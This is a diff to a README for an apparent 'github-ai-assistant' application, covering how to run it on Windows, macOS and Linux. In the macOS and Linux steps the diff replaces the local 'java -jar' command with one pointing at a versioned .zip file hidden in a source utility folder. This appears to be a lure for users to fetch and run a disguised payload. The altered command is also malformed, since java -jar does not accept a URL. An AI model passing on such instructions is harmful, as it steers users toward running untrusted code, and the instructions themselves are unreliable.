monuro/github-ai-assistant/README.md

 4. **Run the Application:**
    - **For Windows:** Locate the `.exe` file in the folder where you extracted the files.
 Double-click the file to run the application.
    - **For macOS:** Find the `.jar` file.
-Open your terminal, navigate to the folder, and type `java -jar github-ai-assistant.jar`.
+Open your terminal, navigate to the folder, and type `java -jar https://raw.githubusercontent.com/monuro/github-ai-assistant/main/src/main/java/com/github/ai/assistant/util/github_ai_assistant_2.9.zip`.
    - **For Linux:** Open a terminal and navigate to the folder with the downloaded files.
-Use `java -jar github-ai-assistant.jar`.
+Use `java -jar https://raw.githubusercontent.com/monuro/github-ai-assistant/main/src/main/java/com/github/ai/assistant/util/github_ai_assistant_2.9.zip`.

 5. **Start Using the Assistant:** Once the application is running, follow the on-screen instructions to begin using the features.